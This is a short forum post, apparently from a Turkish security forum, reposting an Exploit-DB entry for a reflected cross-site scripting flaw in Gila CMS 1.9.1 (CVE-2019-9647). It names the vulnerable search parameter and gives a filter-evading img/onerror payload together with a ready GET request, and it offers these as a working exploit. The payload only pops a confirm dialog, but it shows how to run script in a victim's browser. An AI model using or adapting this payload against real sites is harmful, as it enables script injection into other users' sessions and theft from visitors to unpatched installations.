Gila CMS (search) Cross Site Scripting

Kacamax · 24 Mar 2019

# Exploit Basligi / Exploit Title: Gila CMS (search) Cross Site Scripting
# Tarih / Date: 11.03.2019
# Exploit Yazar / Exploit Author: Ahmet Ümit BAYRAM
# Yapimci Adresi / Vendor Homepage: https://gilacms.com
# Yazilim Adresi / Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip
# Demo Adresi / Demo Site: https://gilacms.com/demo/
# Versiyon / Version: 1.9.1
# Test Edilen Sistem / Tested on: Kali Linux
# CVE: CVE-2019-9647

Exploit:

Kod:

[COLOR="darkorange"]# Acik Bulunan Parametre:[/COLOR] search

[COLOR="darkorange"]# Eklenecek:[/COLOR] <--`<img/src=` onerror=confirm``> --!>

[COLOR="darkorange"]# GET Request:[/COLOR] http://localhost/?search=<--`<img/src=` onerror=confirm``> --!>

Exploit Adresi:
https://www.exploit-db.com/exploits/46557

Gila CMS (search) Cross Site Scripting

Kacamax

Katılımcı Üye

Sosyal medya sayfalarımız